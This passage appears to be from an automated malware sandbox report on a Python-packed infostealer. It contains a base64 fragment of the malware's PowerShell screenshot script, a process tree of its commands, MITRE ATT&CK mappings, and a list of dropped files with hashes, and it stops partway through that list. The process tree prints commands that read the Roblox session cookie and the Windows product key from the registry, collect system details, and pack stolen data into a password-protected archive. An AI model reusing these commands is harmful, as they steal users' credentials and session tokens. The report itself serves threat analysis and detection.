AAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4856
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p5b4p0e4\p5b4p0e4.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3544
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA44E.tmp" "c:\Users\Admin\AppData\Local\Temp\p5b4p0e4\CSC2A19867965334512904FF166D8FEF8A.TMP"
        6⤵
        
        PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4376
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3232
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4804
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35722\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\qYYFt.zip" *"
    3⤵
    PID:3144
  - - C:\Users\Admin\AppData\Local\Temp\_MEI35722\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI35722\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\qYYFt.zip" *
      4⤵
      Executes dropped EXE
      PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a7753640b549244dafbbbc068e9bc5b

SHA1
973287b37dd2c8ef662db9829ec82205793e8e78

SHA256
a700ed9ed24158a89ecb35d49e0ea31f83ba123073ed07f35f990242e1a00799

SHA512
0fed225e1fb142050cd8db3a1c104d0fa72c74d673bdc3b3e9259526159c24478d255098c7bd798d936077727ea8c46e4456c393beba66b831724945a573e54b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6317adf4fbc43ea2fd68861fafd57155

SHA1
6b87c718893c83c6eed2767e8d9cbc6443e31913

SHA256
c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af

SHA512
17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
9d737602ce1294db9496f81f7d1b9b70

SHA1
c0ce66d5335f1d614f640d220791503a2ca0effb

SHA256
5bb96b5d8122947006a759fc4a5e31f34f5d34360cb55448b85cd8f7a3346be8

SHA512
f4af041dc8a8ebc7bbb1b70ea0e19802d78456dae46f2ffba3dc3be6011a993acca001b9701f1a3e3e3b480ed3b3f8d9589e0f1da2b819555e60d8196b119f6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA44E.tmp

Filesize
1KB

MD5
be47903c927257073f9fbc0e456880ef

SHA1
09023cbd3f1383abeacf270bf15aa95d9642a144

SHA256
9d0d239520a4d31b38963c6243b1d86627870ff9af925f3a9cb8ab0d11e8ea3c

SHA512
c055fc7ca18508321f6ddd6d2399ad5379fccb8919e65aefbf29155b80bef36db3bc9afab22c49b96a1ed383e44971e744c9690caeac98edbf60c0f6331b2978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_bz2.pyd

Filesize
48KB

MD5
82e4f19c1e53ee3e46913d4df0550af7

SHA1
283741406ecf64ab64df1d6d46558edd1abe2b03

SHA256
78208da0890aafc68999c94ac52f1d5383ea75364eaf1a006d8b623abe0a6bf0

SHA512
3fd8377d5f365499944a336819684e858534c8a23b8b24882f441318ec305e444e09125a0c0aedc10e31dbf94db60b8e796b03b9e36adbad37ab19c7724f36ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_ctypes.pyd

Filesize
59KB

MD5
fa360b7044312e7404704e1a485876d2

SHA1
6ea4aad0692c016c6b2284db77d54d6d1fc63490

SHA256
f06c3491438f6685938789c319731ddf64ba1da02cd71f43ab8829af0e3f4e2f

SHA512
db853c338625f3e04b01b049b0cb22bdaed4e785eb43696aeda71b558f0f58113446a96a3e5356607335435ee8c78069ce8c1bcdb580d00fd4baacbec97a4b6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_decimal.pyd

Filesize
107KB

MD5
b7012443c9c31ffd3aed70fe89aa82a0

SHA1
420511f6515139da1610de088eaaaf39b8aad987

SHA256
3b92d5ca6268a5ad0e92e5e403c621c56b17933def9d8c31e69ab520c30930d9

SHA512
ec422b0bee30fd0675d38888f056c50ca6955788d89c2a6448ddc30539656995627cf548e1b3aa2c4a77f2349b297c466af8942f8133ef4e2dfb706c8c1785e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_hashlib.pyd

Filesize
35KB

MD5
3a4a3a99a4a4adaf60b9faaf6a3edbda

SHA1
a55ea560accd3b11700e2e2600dc1c6e08341e2f

SHA256
26eed7aac1c142a83a236c5b35523a0922f14d643f6025dc3886398126dae492

SHA512
cb7d298e5e55d2bf999160891d6239afdc15ada83cd90a54fda6060c91a4e402909a4623dcaa9a87990f2af84d6eb8a51e919c45060c5e90511cd4aadb1cdb36

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_lzma.pyd

Filesize
86KB

MD5
bad668bbf4f0d15429f66865af4c117b

SHA1
2a85c44d2e6aa09ce6c11f2d548b068c20b7b7f8

SHA256
45b1fcdf4f3f97f9881aaa98b00046c4045b897f4095462c0bc4631dbadac486

SHA512
798470b87f5a91b9345092593fc40c08ab36f1684eee77654d4058b37b62b40ec0deb4ac36d9be3bb7f69adfdf207bf150820cdbc27f98b0fa718ec394da7c51

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_queue.pyd

Filesize
26KB

MD5
326e66d3cf98d0fa1db2e4c9f1d73e31

SHA1
6ace1304d4cb62d107333c3274e6246136ab2305

SHA256
bf6a8c5872d995edab5918491fa8721e7d1b730f66c8404ee760c1e30cb1f40e

SHA512
d7740693182040d469e93962792b3e706730c2f529ab39f7d9d7adab2e3805bb35d65dc8bb2bd264da9d946f08d9c8a563342d5cb5774d73709ae4c8a3de621c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_socket.pyd

Filesize
44KB

MD5
da0dc29c413dfb5646d3d0818d875571

SHA1
adcd7ecd1581bcd0da48bd7a34feccada0b015d6

SHA256
c3365ad1fee140b4246f06de805422762358a782757b308f796e302fe0f5aaf8

SHA512
17a0c09e2e18a984fd8fc4861397a5bd4692bcd3b66679255d74bb200ee9258fb4677b36d1eaa4bd650d84e54d18b8d95a05b34d0484bd9d8a2b6ab36ffffcdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_sqlite3.pyd

Filesize
57KB

MD5
5f31f58583d2d1f7cb54db8c777d2b1e

SHA1
494587d2b9e993f2e5398d1c745732ef950e43b6

SHA256
fad9ffcd3002cec44c3da9d7d48ce890d6697c0384b4c7dacab032b42a5ac186

SHA512
8a4ec67d7ad552e8adea629151665f6832fc77c5d224e0eefe90e3aec62364a7c3d7d379a6d7b91de0f9e48af14f166e3b156b4994afe7879328e0796201c8ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\_ssl.pyd

Filesize
66KB

MD5
e33bf2bc6c19bf37c3cc8bac6843d886

SHA1
6701a61d74f50213b141861cfd169452dde22655

SHA256
e3532d3f8c5e54371f827b9e6d0fee175ad0b2b17e25c26fdfb4efd5126b7288

SHA512
3526bcb97ad34f2e0c6894ee4cd6a945116f8af5c20c5807b9be877eb6ea9f20e571610d30d3e3b7391b23ddcd407912232796794277a3c4545cbcb2c5f8ed6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\base_library.zip

Filesize
1.3MB

MD5
242a4d3404414a9e8ed1ca1a72e8039c

SHA1
b1fd68d13cc6d5b97dc3ea8e2be1144ea2c3ed50

SHA256
cb98f93ede1f6825699ef6e5f11a65b00cdbc9fdfb34f7209b529a6e43e0402d

SHA512
cca8e18cc41300e204aee9e44d68ffe9808679b7dbf3bec9b3885257cadccff1df22a3519cc8db3b3c557653c98bac693bf89a1e6314ef0e0663c76be2bf8626

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\blank.aes

Filesize
109KB

MD5
0b2ce56813d4e8e0349a6a18cb18b5a1

SHA1
71ea74e289e73ea0074dc41035b4b71066e2fe88

SHA256
ba241b2f653a4cb659ab8cdd4f4e495c435b3ef3723e93b00b3a802e80bdfd66

SHA512
813ee8a7301004eb97ccad8eb3ad5452511ddc0f2525b546cf283d7b1fbe27426bd8e03a916450e20fe60197fc718039089c29dc4aab08d633a24891dba0c3cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\libcrypto-3.dll

Filesize
1.6MB

MD5
7f1b899d2015164ab951d04ebb91e9ac

SHA1
1223986c8a1cbb57ef1725175986e15018cc9eab

SHA256
41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

SHA512
ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\libssl-3.dll

Filesize
222KB

MD5
264be59ff04e5dcd1d020f16aab3c8cb

SHA1
2d7e186c688b34fdb4c85a3fce0beff39b15d50e

SHA256
358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

SHA512
9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\python312.dll

Filesize
1.7MB

MD5
eb02b8268d6ea28db0ea71bfe24b15d6

SHA1
86f723fcc4583d7d2bd59ca2749d4b3952cd65a5

SHA256
80222651a93099a906be55044024d32e93b841c83554359d6e605d50d11e2e70

SHA512
693bbc3c896ad3c6044c832597f946c778e6c6192def3d662803e330209ec1c68d8d33bd82978279ae66b264a892a366183dcef9a3a777e0a6ee450a928268e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\select.pyd

Filesize
25KB

MD5
33722c8cd45091d31aef81d8a1b72fa8

SHA1
e9043d440235d244ff9934e9694c5550cae2d5ab

SHA256
366fca0b27a34835129086c8cde1e75c309849e37091db4adeda1be508f2ee12

SHA512
74217abec2727baaa5138e1b1c4bac7d0ca574cf5a377396fc1ca0d3c07beb8aaa374e8060d2b5f707426312c11e0a34527ee0190e979e996f3b822efa24852f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\sqlite3.dll

Filesize
644KB

MD5
68b435a35f9dcbc10b3cd4b30977b0bd

SHA1
9726ef574ca9bda8ec9ab85a5b97adcdf148a41f

SHA256
240d6d3efac25af08fe41a60e181f8fdcb6f95da53b3fad54b0f96680e7a8277

SHA512
8e133b72bd3776f961258793c2b82d2cd536c7ae0ed0241daa2f67d90a6968f563b72f74a1c33d9bdfb821b796612faa7a73a712369ff3b36d968e57bfcdd793

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI35722\unicodedata.pyd

Filesize
296KB

MD5
6dd43e115402d9e1c7cd6f21d47cfcf5

SHA1
c7fb8f33f25b0b75fc05ef0785622aa4ec09503c

SHA256
2a00f41bbc3680807042fc258f63519105220053fb2773e7d35480515fad9233

SHA512
72e266eb1ce5cbbcfd1d2a6f864538efd80b3ed844e003e2bd9566708fee0919447290a3b559ea27c32794f97a629a8fe8fc879654ffa609fca5c053dac70c69

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_csn5cmfd.jns.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\p5b4p0e4\p5b4p0e4.dll

Filesize
4KB

MD5
01ccae51b7b5c23e14c7d3eae273e48c

SHA1
313f57b378aae117e6dacc976501bff9722eb6e2

SHA256
a0c0fd21578cdde4649542d85b13f98fbc20f09695d849c2279ec97e14d4dee6

SHA512
ad0b72da03f3cecb8051ba4d56e59bfe5243b4988d1b40867820e482de1ec6235700b413379f055cf90713f6b6d28302262e7c782b1ef2b7b21529700b564852

Download Submit
C:\Users\Admin\AppData\Local\Temp\qYYFt.zip

Filesize
438KB

MD5
b30f500a6c2c25de283f244dda5c9db5

SHA1
8b5939905da3f9ac8db2bdd0bf80548d19a0b55d

SHA256
b52133c1f360eda1c8d27d46e63e0754ad477963c40e5b994ffa7b4c67955012

SHA512
74ef41d6614fdf38d5294accdc0b2eafecff1e472637f4fca4b8071009b27c1915ecc90a97bbe78b8d2a0c155a941fb294efb1038e78dd6dfe6fd2bf8cde0b39

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Credentials\Chrome\Chrome Cookies.txt

Filesize
257B

MD5
cac7e3f83dade55eac5381c72bfe6549

SHA1
5fd1d2656432cbb1401f7b7697c9aef9240d7942

SHA256
54a6a02c63cfa7e1a3df0b4a00d41ec830539b434e0e39e736ef4aeec3c1975e

SHA512
e107f4edf78ed58db94522548513d8636f33edfb43bf292e909f6e65b0309846160045aee3615baab89be4c96b1b29c837770c75a60fcd03ae483cb6535ce395

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Directories\Desktop.txt

Filesize
614B

MD5
d0a584bb8c0fd653d4eb39a91b4271c5

SHA1
44fece39afb9b12c07d7ac19017ed38b14d63ff1

SHA256
1b532a850398a70c31bfcef33b2cda73ed217ce3d8b067c046759c0aff25710b

SHA512
a7ff9d0998bd704631c35a7782ea64cf8727760cb0eb1273308328f9b4cce714630ff5079fee8f1d1d3a677fcb480cebf5b284b5c11b042492a14d3dc004b09f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Directories\Documents.txt

Filesize
1KB

MD5
0c1c65ca6fd4176273d21a4ba11e6ffa

SHA1
e57e0ecfea3bcd0a60590722059ffee1fe2853fc

SHA256
8a34ae04ea4c8cfab879036826f0f6e447d9cb80bcccb10210a41ce086e8f8e7

SHA512
88d841608dff9d0b22333e43137f7886761241ca5b3eecad034a48cb4b77388fa71575b7a0cc4ab7469024f3b498886078b294a24e1ce151eaefae50f8f4a898

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Directories\Downloads.txt

Filesize
687B

MD5
aa282782c71fd41008ea82d7a5e11164

SHA1
4862d5b0fa962c39db6da5f5d38d735e3c2058c9

SHA256
2eab0143f0fb55d6dc49a6dea5f418831cac69f679f6482ad0a7c5e988c7dc22

SHA512
4c127d68654a91f89e4995ad2ff842cff4f90f99f06c8ce81de86d42d11b5a35b78a57cb63efbe42686eb471f70b6f9c2298e4dbc31e2cc4cc016ce6d6838cc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Directories\Music.txt

Filesize
487B

MD5
561c84764b058f621146da673d93ac15

SHA1
34ac5aa90f71ee6e449a47135cc18996014704b2

SHA256
5cb06ee3838dc77dab17f7e289a0becb268c933facd7fd39fddee9a7b8d86fae

SHA512
2ca2d5b3d6c44b56ff265e09a5ea7ba80f22bcce5a8f75fe80f4807ae81acb0b3154d666d03dc988a60ebe49c976f992267c97f038bdcdb089e93424b67d8877

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Directories\Pictures.txt

Filesize
826B

MD5
1f9288cf572b2eb3e68406585cc3978c

SHA1
89a80df096e3867df4727cb27021173381bdb6e3

SHA256
d37597f72a5b6a2e7d45ee1cbf7076d04c1e5ec7781fb627cd47ed6b629ce7dc

SHA512
c5c7cab65f18bc1e889bf34ce5f572b2909a90896bdc08a9347efc89dbd715fba4393345b6e799c1a9c445bcfacc3b732399a40dacb52df2e328a97178bae4dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Display (1).png

Filesize
434KB

MD5
bf513648732f034bdd1d174dd52103c0

SHA1
2b6d86a94db4ef2ba11fee4f72d70cbdcd3019e9

SHA256
5f1370860814480925816e99e56835ff0fb84df9879fea917ffcb8dc5325fb4c

SHA512
d6ec0861eedee05e84b87b22bb7d83ad2f1aedd22ece2e8ca729ea0abea65c28c4b65d2089447844636bcf8b3c407ef7f1f1e518cf5b4d4f7e3098f6d1126cab

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \System\MAC Addresses.txt

Filesize
232B

MD5
4bc7f90dcc7490dabeb2b79a3371f14e

SHA1
9e33a98304d5c3f585b99935533a6bccab912ede

SHA256
